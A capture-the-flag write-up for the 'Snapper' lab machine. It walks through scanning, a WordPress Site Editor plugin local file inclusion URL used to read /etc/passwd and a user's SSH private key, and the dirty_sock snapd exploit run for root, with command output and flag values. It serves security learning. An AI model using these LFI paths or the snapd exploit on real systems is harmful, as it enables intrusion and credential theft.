217 Snapper - uad360

0x01 Challenge:

Level: Easy-Medium

Description:

217 Snapper

Get user and root flags. author: torombolo

0x02 User write-up:

We start by scanning the IP to get active services.

nmap -sV -Pn -T5 192.168.105.111
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-14 09:15 BST
Nmap scan report for 192.168.105.111
Host is up (0.00041s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.34 ((Ubuntu))
MAC Address: 52:54:00:A8:CA:93 (QEMU virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.41 seconds

If we enum the web we will see interesting paths. The most prominent is the wordpress installed.

/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/blog (Status: 301) ----------------------
/index.html (Status: 200)
/index.php (Status: 200)
/javascript (Status: 301)
/server-status (Status: 403)

The most logical way to perform is to do a first scan with wpscan, which will show us a LFI (local file inclusion) vulnerability.

 | [!] 1 vulnerability identified:
 |
 | [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9044
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7422
 |      - http://seclists.org/fulldisclosure/2018/Mar/40
 |      - https://github.com/SiteEditor/editor/issues/2

Basically, the vulnerability explains that by visiting a specific path we can list computer files. The path in question is: http://(HOST)/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=(FILE_TO_LIST). We will do the PoC with /etc/passwd.

It works!

Now we can list the ssh private key of one of the users to be able to connect to the machine.

• User: masterblaster
• Path: /home/masterblaster/.ssh/id_rsa

If we copy the rsa key to our machine and try to connect using it… (Remember to give 600 permissions to the file).

➜  ~ ssh masterblaster@192.168.105.111 -i .ssh/snapper
The authenticity of host '192.168.105.111 (192.168.105.111)' can't be established.
ECDSA key fingerprint is SHA256:95id/6gGifLj0lHnpKkICP9wAeECnGU/SHstsKBQ1Vo.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.105.111' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.10 (GNU/Linux 4.18.0-20-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


239 packages can be updated.
2 updates are security updates.

Last login: Sat Jun  8 17:18:17 2019 from 192.168.1.110
masterblaster@masterblaster-Standard-PC-Q35-ICH9-2009:~$ ls
Desktop  Documents  Downloads  examples.desktop  flag.txt  Music  Pictures  Public  Templates  Videos
masterblaster@masterblaster-Standard-PC-Q35-ICH9-2009:~$ cat flag.txt
uad360{b2143fa23fcfb6145f1bc9cca80dcbab}
masterblaster@masterblaster-Standard-PC-Q35-ICH9-2009:~$ 

All right! We have user and the first flag

User flag: uad360{b2143fa23fcfb6145f1bc9cca80dcbab}

0x03 Root write-up:

To get the root flag, if we list enough we can see that the snap version is not the most recent (the name of the machine helps to realize).

masterblaster@masterblaster-Standard-PC-Q35-ICH9-2009:~$ snap --version
snap    2.35.5+18.10
snapd   2.35.5+18.10
series  16
ubuntu  18.10
kernel  4.18.0-20-generic

That particular version is vulnerable to local privilege escalation as we can see here. The instructions to follow for the exploitation are:

• Create an account at the https://login.ubuntu.com/.
• After confirming it, edit your profile and upload an SSH public key.
• Run the exploit specifying the private key associated with the public upload to the web.

As we have said, we created the account in the link and we will upload the ssh key to its corresponding section.

In order to avoiding upload our personal ssh key for obvious reasons, we created a new one in a linux as we see here:

➜  /tmp ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /root/.ssh/snapper_root
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/snapper_root.
Your public key has been saved in /root/.ssh/snapper_root.pub.
The key fingerprint is:
SHA256:hRkMNEgC26et0GnVyhmW0MPGzZDZdPNUs8MFlgYXcF0 root@kali
The key's randomart image is:
+---[RSA 2048]----+
|..o=o@=o+ ++O=..E|
| o oXo+o.B =o+.  |
|. ..*.. o o.+    |
| . O +   .   .   |
|. = =   S        |
| o .             |
|  .              |
|                 |
|                 |
+----[SHA256]-----+

We upload the generated public key. We pass the exploit and the private key to the vulnerable machine and launch it by specifying the key and the account mail.

masterblaster@masterblaster-Standard-PC-Q35-ICH9-2009:/dev/shm$ python3 snapd.py -u sugomum@uber-mail.com -k snapper_root

      ___  _ ____ ___ _   _     ____ ____ ____ _  _ 
      |  \ | |__/  |   \_/      [__  |  | |    |_/  
      |__/ | |  \  |    |   ___ ___] |__| |___ | \_ 
                       (version 1)

//=========[]==========================================\\
|| R&D     || initstring (@init_string)                ||
|| Source  || https://github.com/initstring/dirty_sock ||
|| Details || https://initblog.com/2019/dirty-sock     ||
\\=========[]==========================================//


[+] Slipped dirty sock on random socket file: /tmp/bgsfawbofu;uid=0;
[+] Binding to socket file...
[+] Connecting to snapd API...
[+] Sending payload...
[+] Success! Enjoy your new account with sudo rights!
Welcome to Ubuntu 18.10 (GNU/Linux 4.18.0-20-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


239 packages can be updated.
2 updates are security updates.

New release '19.04' available.
Run 'do-release-upgrade' to upgrade to it.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

r00tdevploit@masterblaster-Standard-PC-Q35-ICH9-2009:~$ id
uid=1001(r00tdevploit) gid=1001(r00tdevploit) groups=1001(r00tdevploit)
r00tdevploit@masterblaster-Standard-PC-Q35-ICH9-2009:~$ sudo -s
root@masterblaster-Standard-PC-Q35-ICH9-2009:~# GGWP

We got root shell!

Finally we visit the path where the flag is.

root@masterblaster-Standard-PC-Q35-ICH9-2009:/root# cat flag.txt
uad360{fb9bf208b033aee53a16a5255b3b3039}

Root flag: uad360{fb9bf208b033aee53a16a5255b3b3039}